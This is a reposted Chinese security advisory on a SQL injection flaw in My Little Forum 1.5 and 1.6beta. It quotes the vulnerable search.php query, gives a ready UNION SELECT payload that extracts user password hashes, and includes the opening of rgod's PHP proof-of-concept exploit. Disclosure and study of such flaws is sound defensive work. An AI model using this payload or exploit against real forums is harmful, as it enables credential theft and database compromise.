My Little Forum search.php远程SQL注入漏洞
2008-04-09 04:16:07来源:互联网 阅读 ()
发布日期:2005-09-23
更新日期:2005-09-23
受影响系统:
my little homepage My Little Forum 1.6beta描述:
my little homepage My Little Forum 1.5
BUGTRAQ ID: 14908
My Little Forum是一款简单的WEB论坛程序。
My Little Forum中存在SQL注入漏洞,成功利用这个漏洞的攻击者可以完全入侵基础数据库系统。
在search.php的第144行:
...
$result = mysql_query("SELECT id, pid, tid, DATE_FORMAT(time INTERVAL ".
$time_difference." HOUR,'".$lang['time_format']."') AS Uhrzeit,
DATE_FORMAT(time INTERVAL ".$time_difference." HOUR, '".$lang['time_format']."')
AS Datum, subject, name, email, hp, place, text, category FROM ".$forum_table."
WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", "
.$settings['search_results_per_page'], $connid);
...
然后在搜索页面,选择“phrase”,然后键入:
[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
user_name='[username]' /*
由于没有过滤$searchstring变量,如果关闭了magic quote的话,就可以得到任何管理员/用户口令哈希。
1.6beta版也受漏洞影响:
...
$result = mysql_query("SELECT id, pid, tid, UNIX_TIMESTAMP(time INTERVAL \
".$time_difference." HOUR) AS Uhrzeit, subject, name, email, hp, place, text, \
category FROM ".$db_settings['forum_table']." WHERE ".$search_string." ORDER BY tid \
DESC, time ASC LIMIT ".$ul.", ".$settings['search_results_per_page'], $connid);
...
在注入字符串中删除语句,可得到同样的结果
[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
user_name='[username]' /*
<*来源:rgod (rgod@autistici.org)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112741430006983&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# mlfexpl.php #
# #
# My Little Forum 1.5 ( possibly prior versions) SQL Injection / #
# MD5 password hash disclosure poc exploit with proxy support #
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: launch this script from Apache, fill requested fields, then... #
# dump all password hashes from database right now... #
# #
# Sun-Tzu: "You can be sure of succeeding in your attacks if you only attack #
# places which are undefended. You can ensure the safety of your defense if #
# you only hold positions that cannot be attacked." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<head><title>My Little Forum 1.5 SQL Injection </title><meta http-equiv="Co
ntent-Type" content="text/html; charset=iso-8859-1"><style type="text/css"><!--
body,td,th { color: #00FF00;} body { background-color: #000000;} .Stile5 {
font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px;} .Stile6{
font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; font-sty
le: italic; } --> </style></head> <body> <p class="Stile6"> My Little Forum 1
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
